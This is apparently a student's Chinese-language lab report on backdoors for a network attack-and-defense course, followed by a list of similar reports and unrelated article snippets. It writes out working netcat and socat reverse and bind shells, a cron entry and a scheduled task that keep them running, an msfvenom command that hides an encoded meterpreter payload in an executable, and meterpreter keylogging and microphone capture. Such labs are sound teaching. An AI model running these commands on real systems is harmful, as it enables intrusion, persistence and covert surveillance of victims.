实验目的

学习建立一个后门连接。

教程

实验内容

  • 使用netcat获取主机操作Shell,cron启动。
  • 使用socat获取主机操作Shell, 任务计划启动。
  • 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell。
  • 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权。

实验要求

  • 使用nc实现win,mac,Linux间的后门连接。
  • meterpreter的应用。
  • MSF POST 模块的应用

实验步骤

(一)netcat获取主机操作Shell,cron启动。

  • Cron是Linux下的定时任务,使用cron实现定时获取Windows主机shell
  • 先测试看看Windows主机和Linux主机能不能互相获取shell
  • nc需要的主要参数
-l :绑定并侦听传入的连接(一般用于服务端)
-p :侦听的端口
-e :接收到的命令通过command(例如/bin/bash)执行
  • windows主机运行ncat.exe打开监听端口
ncat.exe -l -p 5315
  • linux主机连接Windows主机的5315端口
nc 192.168.43.97 5315 -e /bin/sh
  • 这时候Windows就获得了Linux的shell

  • 关闭原来的终端,Linux主机运行打开监听端口,Windows主机连接监听端口。
ncat.exe -e cmd.exe 192.168.102.130 5315
  • 运行结果:
  • 测试完成,在Linux中使用crontab增加定时条件:
    • crontab -e进入编辑模式
    • 选择3. /usr/bin/vim.basic
    • 在最后一行添加定时条件30 * * * * /bin/netcat 192.168.43.97 5315 -e /bin/sh
  • 每小时30分的时候自启动

(二)使用socat获取主机操作Shell, 任务计划启动。

  • Windows下载socat,在任务计划程序中新建一个任务
  • 将触发器设置为当锁定任何用户的工作站时
  • 将程序或脚本设置为下载的socat文件,参数中添加``tcp-listen:5315 exec:cmd.exe,pty,stderr```
  • 在Windows中运行任务,在Linux中输入socat -tcp:192.168.43.97:5315 就会连接到Windows主机。

(三)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell。

  • 将Windows下的一个可执行文件生成一个后门文件
msfvenom -p windows/meterpreter/reverse_tcp -x ./ysf1.exe -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.102.130 LPORT=5315 -f exe > 20155315_backdoor.exe

参数说明:

-p 使用的payload。payload翻译为有效载荷,就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode.
-x 使用的可执行文件模板,payload(shellcode)就写入到这个可执行文件中。
-e 使用的编码器,用于对shellcode变形,为了免杀。
-i 编码器的迭代次数。如上即使用该编码器编码5次。
-b badchar是payload中需要去除的字符。
LHOST 是反弹回连的IP
LPORT 是回连的端口
-f 生成文件的类型
> 输出到哪个文件
  • Linux使用nc将生成的文件发送给Windows
nc 192.168.102.1 5315 > 20155315_backdoor.exe
  • Windows使用nc接收文件
ncat.exe -l 5315 > 20155315_backdoor.exe
  • 在linux中运行msfconsole
  • 在msfconsole中设置参数
use exploit/multi/handler //进入handler模式
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.102.130
set LPORT 443
  • Linux运行exploit,Windows打开后门软件,等一段时间就成功了。

(四)使用MSF 使用MSF meterpreter(或其他软件)生成获取目标主机音频、击键记录等内容,并尝试提权。

  • 获取录音:record_mic

  • 获取截图:screenshot
  • 获取击键记录:keyscan_start显示击键记录:keyscan_dump

实验中遇到的问题

  • 一开始测试nc的时候,网络连接出错,使用ifconfig发现是Linux的网络没有连上,只有一个网卡,查找网上的资料修改配置之后就可以连接网络了。
  • 在获取摄像头的时候出现了错误,查找资料尚未解决。

基础问题回答

  • 例举你能想到的一个后门进入到你系统中的可能方式?

    • 从网上下载的来路不明的文件可能被篡改
    • 通过中毒的移动设备进入计算机
  • 例举你知道的后门如何启动起来(win及linux)的方式?
    • Windows可以使用任务计划
    • linux可以使用cron定时触发
  • Meterpreter有哪些给你映像深刻的功能?
    • 截取键盘击键记录:本来以为获取密码等等的输入都要输到特殊的软件里,没想到直接使用命令就可以获取
    • 录音:感觉很刺激又有点危险,在生活中要做好安全防御工作。
  • 如何发现自己有系统有没有被安装后门?
    • 使用杀毒软件定期进行杀毒
    • 查看本机端口,查资料判断是否有被异常开放的端口。

实验总结

初步体验了一下酷炫的操作,一开始运行nc的时候就特别兴奋,一步步做下来感觉很棒,虽然对命令不是很熟悉,但是理解每一步的用处再将其实现就很有成就感。在提权和截取摄像头的时候都出现了错误,用了网上的方法之后出现Exploit aborted due to failure: not-vulnerable: Windows 10 (Build 16299). is not vulnerable.表示win10可能不好攻击。本次实验用的后门还可以被安全软件发现,之后学习了免杀的病毒之后就更难被发现了,虽然很酷炫,但是生活中更要注意对本机安全的保护。

参考资料

2017-2018-2 20155315《网络对抗技术》Exp2:后门原理与实践的更多相关文章

  1. 2019-2020-2 20175226 王鹏雲 网络对抗技术 Exp2 后门原理与实践

    2019-2020-2 20175226 王鹏雲 网络对抗技术 Exp2 后门原理与实践 实验内容 使用netcat获取主机操作Shell,cron启动: 使用socat获取主机操作Shell, 任务 ...

  2. 20155326刘美岑 《网络对抗》Exp2 后门原理与实践

    20155326刘美岑 <网络对抗>Exp2 后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...

  3. 20155320《网络对抗》Exp2 后门原理与实践

    20155320<网络对抗>Exp2 后门原理与实践 [实验内容] (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, ...

  4. 20155324《网络对抗》Exp2 后门原理与实践

    20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...

  5. 20155208徐子涵《网络对抗》Exp2 后门原理与实践

    20155208徐子涵<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 答:当我们在非官方网站上下载软件时,后门极有可能会进入我们 ...

  6. 20145236《网络对抗》Exp2 后门原理与实践

    20145236<网络对抗>Exp2 后门原理与实践 目录: 一.基础问题回答 二.常用后门工具实践 2.1 Windows获得Linux Shell 2.2 Linux获得Windows ...

  7. 20155202 张旭《网络对抗》Exp2 后门原理与实践

    20155202 张旭<网络对抗>Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 捆绑在软件中 注入在可执行文件里 注入在office文件的宏里面 ...

  8. 20155218《网络对抗》Exp2 后门原理与实践

    20155218<网络对抗>Exp2 后门原理与实践 常用后门工具实践 1.Windows获得Linux Shell: 在Windows下,先使用ipconfig指令查看本机IP,使用nc ...

  9. 20155227《网络对抗》Exp2 后门原理与实践

    20155227<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 在非官方网站下载软件时,后门很可能被捆绑在软件中. 攻击者利用欺 ...

  10. 20155232《网络对抗》Exp2 后门原理与实践

    20155232<网络对抗>Exp2 后门原理与实践 问题回答 1.例举你能想到的一个后门进入到你系统中的可能方式? 通过网页上弹出来的软件自动安装 2.例举你知道的后门如何启动起来(wi ...

随机推荐

  1. HBase Region分裂实现

    分裂策略 不同的分裂策略的实现需要继承RegionSplitPolicy,主要实现两个方法: shouldSplit()表示是否需要分裂 getSplitPoint()得到分裂点rowkey 从 HB ...

  2. SQL Server ->> 数据类型不一致比较时的隐式转换

    当使用操作符进行比较的时候,两边数据类型不一致的情况下,数据类型优先级别低的会往优先级别高的发生隐式转换.下面的参考链接是优先级别列表. 参考: Data Type Precedence (Trans ...

  3. java并发之同步辅助类CyclicBarrier和CountDownLatch

    CyclicBarrier 的字面意思是可循环使用(Cyclic)的屏障(Barrier).它要做的事情是,让一组线程到达一个屏障(也可以叫同步点)时被阻塞,直到最后一个线程到达屏障时,屏障才会开门, ...

  4. word 排版用到双直线、波浪线、虚线 、直线、隔行线等技巧

    在办公或毕业设计时,有时排版需要插入双直线.波浪线.虚线 .直线.隔行线等而烦恼, 今天小白与大家分享技巧如下: 感谢您的阅读,如果您觉得阅读本文对您有帮助,请点一下“推荐”按钮.本文欢迎各位转载,但 ...

  5. Redis学习---Redis的免密操作

    Redis的免密操作 问题解决[方式一]:当前这种linux配置redis密码的方法是一种临时的,如果redis重启之后密码就会失效 1.首先进入redis,如果没有开启redis则需要先开启: [r ...

  6. 搭建企业级NFS网络文件共享服务[二]

    1.1.8 NFS问题总结 1.问:使用showmount -e 127.0.0.1后报clnt_create: RPC: Program not registered错误 答:顺序不对,重启nfs服 ...

  7. $.ajax 在请求没有完成,是可以往下继续执行js代码的

    $.ajax({ url:url, data:{}, success:function(arr) { var varHtml='<option value="" checke ...

  8. October 07th 2017 Week 40th Saturday

    Knowledge is a treasure but practice is the key to it. 知识是宝藏,但实践才是打开它的钥匙. Experience often comes fro ...

  9. [2018HN省队集训D5T2] party

    [2018HN省队集训D5T2] party 题意 给定一棵 \(n\) 个点以 \(1\) 为根的有根树, 每个点有一个 \([1,m]\) 的权值. 有 \(q\) 个查询, 每次给定一个大小为 ...

  10. PHP字符串——简单应用

    错误的学习编码语言观点:语言语法不用记,多练习就可以了.   应该是死记住,然后加强练习以免忘记.以及在练习中加强理解.试着想“为什么是这样的语法习惯”.PHP提供了8种数据类型.4种是标量型(单值) ...